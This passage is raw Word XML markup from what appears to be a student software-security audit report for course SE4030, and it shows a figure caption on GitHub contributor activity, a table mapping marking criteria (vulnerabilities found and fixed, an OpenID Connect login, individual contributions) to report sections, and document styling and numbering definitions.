          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A6786B7" wp14:editId="6E935654">
            <wp:extent cx="4670843" cy="2171700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13996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36538" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4710436" cy="2190108"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Figures 2 and 3. GitHub branch list and Insights summary showing the contributor branches, four authors and recorded commit activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2372E265" w14:textId="77777777" w:rsidR="004F5E58" w:rsidRDefault="004F5E58">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="24"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60DCBD0F" w14:textId="2DCD7607" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3" w:rsidP="00E50B46">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="416" w:right="16" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>10. Marking guide coverage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The report addresses each criterion in the supplied SE4030 marking guide. The table below gives the marker a direct route to the supporting evidence.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3414"/>
        <w:gridCol w:w="3414"/>
        <w:gridCol w:w="3414"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2376"/>
            <w:shd w:fill="F2F2F2"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40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Marking criterion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5688"/>
            <w:shd w:fill="F2F2F2"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40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Evidence in this report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>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tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trP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Application scope and complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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Multi-branch POS and inventory system with money, customer PII, roles, departments and approval workflows; not a teaching application.</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Section 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trP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Identifying potential vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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19 findings identified using code review, dependency analysis, dynamic PoCs and regression testing.</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Sections 3-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trP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Fixing the vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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14 findings fixed, five risks documented as deferred, and before/after runtime, unit and frontend test evidence recorded.</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Sections 4-5 and 9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trP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OAuth or OpenID Connect function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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Google OpenID Connect Authorization Code flow with PKCE, explicit ID-token checks and no auto-provisioning.</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Section 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trP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Discussion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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Unfixed risks are justified and preventive engineering practices are discussed with lessons from the audit.</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val="clear" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sections 7-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="237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Individual contribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="568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Member names, index numbers, workstreams and GitHub branch/Insights evidence are included.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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110" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Section 9 and Figures 1-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:sectPr w:rsidR="00345BB3" w:rsidRPr="005C54CB">
      <w:pgSz w:w="11899" w:h="16838"/>
      <w:pgMar w:top="909" w:right="831" w:bottom="1199" w:left="8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D2DE" w14:textId="77777777" w:rsidR="002813D8" w:rsidRDefault="002813D8" w:rsidP="00591D0B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="185B35EF" w14:textId="77777777" w:rsidR="002813D8" w:rsidRDefault="002813D8" w:rsidP="00591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58548" w14:textId="77777777" w:rsidR="002813D8" w:rsidRDefault="002813D8" w:rsidP="00591D0B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2D0599BE" w14:textId="77777777" w:rsidR="002813D8" w:rsidRDefault="002813D8" w:rsidP="00591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E321F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36968F9E"/>
    <w:lvl w:ilvl="0" w:tplc="37EA6596">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="221"/>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1" w:tplc="88442E8E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="108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2" w:tplc="66181102">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="180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3" w:tplc="F8183A52">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="252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4" w:tplc="C3F66148">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="324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5" w:tplc="8CBCB27A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="396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6" w:tplc="84925DB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="468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7" w:tplc="E96EA3B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="540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8" w:tplc="6EA29BC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="612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abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2EA4743A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5128053E"/>
    <w:lvl w:ilvl="0" w:tplc="8FEAAED0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="416"/>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1" w:tplc="E4844968">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="115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2" w:tplc="A25AE312">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="187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3" w:tplc="D22A17B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="259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4" w:tplc="131211F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="331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5" w:tplc="8BDE55E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="403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6" w:tplc="01A099A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="475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7" w:tplc="8214CC2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="547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8" w:tplc="B9FC9EDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="619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abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="31A375CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE10CEC4"/>
    <w:lvl w:ilvl="0" w:tplc="BFD86A02">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="354"/>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1" w:tplc="68087444">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="115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2" w:tplc="F710DA00">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="187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3" w:tplc="CB96D15C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="259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4" w:tplc="401A8BAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="331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5" w:tplc="9EAA8486">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="403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6" w:tplc="7A92B93E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="475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7" w:tplc="FA2E6E82">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="547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8" w:tplc="F112F882">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="619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abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="448A23B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7CAEB812"/>
    <w:lvl w:ilvl="0" w:tplc="3DA65BB4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="264"/>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1" w:tplc="A426E6FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="108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2" w:tplc="3852FFE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="180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3" w:tplc="14AA1122">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="252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4" w:tplc="81DAF144">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="324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5" w:tplc="409AC2F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="396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6" w:tplc="746CED16">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="468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7" w:tplc="10D8745A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="540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8" w:tplc="449A54E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="612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abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4CA648B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3CC7418"/>
    <w:lvl w:ilvl="0" w:tplc="202CC298">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="221"/>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1" w:tplc="EEE8F346">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="108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2" w:tplc="8912E3D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="180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3" w:tplc="C73CDA88">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="252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4" w:tplc="395E1FBE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="324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5" w:tplc="056C65D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="396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6" w:tplc="A920BB76">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="468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7" w:tplc="322882FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="540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lvl w:ilvl="8" w:tplc="55D40EF6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="0B2D56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="518F275D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A21A4128"/>
    <w:lvl w:ilvl="0" w:tplc="FA1A4EF4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="430"/>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1" w:tplc="7442AC24">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="123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2" w:tplc="8D1E2884">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="195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3" w:tplc="A65CC4E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="267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4" w:tplc="4FE0CB04">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="339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5" w:tplc="11AC3CF6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="411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6" w:tplc="1CA8AD48">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="483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7" w:tplc="0E24BF28">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="555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lvl w:ilvl="8" w:tplc="0D7A4D00">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6279"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="EFF7FF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5FC8377F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F1846C4"/>
    <w:lvl w:ilvl="0" w:tplc="1C626260">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="312"/>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1" w:tplc="6AD4DB60">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="115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2" w:tplc="9946A31A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="187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3" w:tplc="A4585E7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="259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4" w:tplc="7BD89234">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="331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5" w:tplc="3ADED140">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="403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6" w:tplc="1DE43E10">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="475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7" w:tplc="56C2E122">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="547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lvl w:ilvl="8" w:tplc="83C6AA78">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6195"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1081103088">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1559053565">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1591355040">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="733509843">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="64843615">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1427385364">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2048218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BB3"/>
    <w:rsid w:val="00031B5E"/>
    <w:rsid w:val="0008357A"/>
    <w:rsid w:val="00095011"/>
    <w:rsid w:val="0011533D"/>
    <w:rsid w:val="001244A6"/>
    <w:rsid w:val="00184B1D"/>
    <w:rsid w:val="002813D8"/>
    <w:rsid w:val="00287B7F"/>
    <w:rsid w:val="00295B48"/>
    <w:rsid w:val="00345BB3"/>
    <w:rsid w:val="004E5A61"/>
    <w:rsid w:val="004F5E58"/>
    <w:rsid w:val="0053711C"/>
    <w:rsid w:val="00591D0B"/>
    <w:rsid w:val="005C54CB"/>
    <w:rsid w:val="005E1802"/>
    <w:rsid w:val="005E2803"/>
    <w:rsid w:val="00674944"/>
    <w:rsid w:val="0068258C"/>
    <w:rsid w:val="007F7EFB"/>
    <w:rsid w:val="008125F0"/>
    <w:rsid w:val="008C216B"/>
    <w:rsid w:val="009078A9"/>
    <w:rsid w:val="009D622B"/>
    <w:rsid w:val="00A80C8A"/>
    <w:rsid w:val="00B52DDE"/>
    <w:rsid w:val="00B606C5"/>
    <w:rsid w:val="00BB3C5C"/>
    <w:rsid w:val="00C23DD3"/>
    <w:rsid w:val="00C73B1A"/>
    <w:rsid w:val="00CA733A"/>
    <w:rsid w:val="00D1427C"/>
    <w:rsid w:val="00E50B46"/>
    <w:rsid w:val="00E868FD"/>
    <w:rsid w:val="00F4495C"/>
    <w:rsid w:val="00FA3666"/>
    <w:rsid w:val="00FC6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51C7"/>
  <w15:docId w15:val="{0F9726D2-CADB-4E19-AB23-FB761BB2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13" w:lineRule="auto"/>
      <w:ind w:left="39"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ind w:left="39"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89" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="39" w:hanging="10"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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B2D56"/>
      <w:sz w:val="23"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="Heading1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="0B2D56"/>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91D0B"/>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591D0B"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="152235"/>
      <w:sz w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00591D0B"/>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591D0B"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="152235"/>
      <w:sz w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
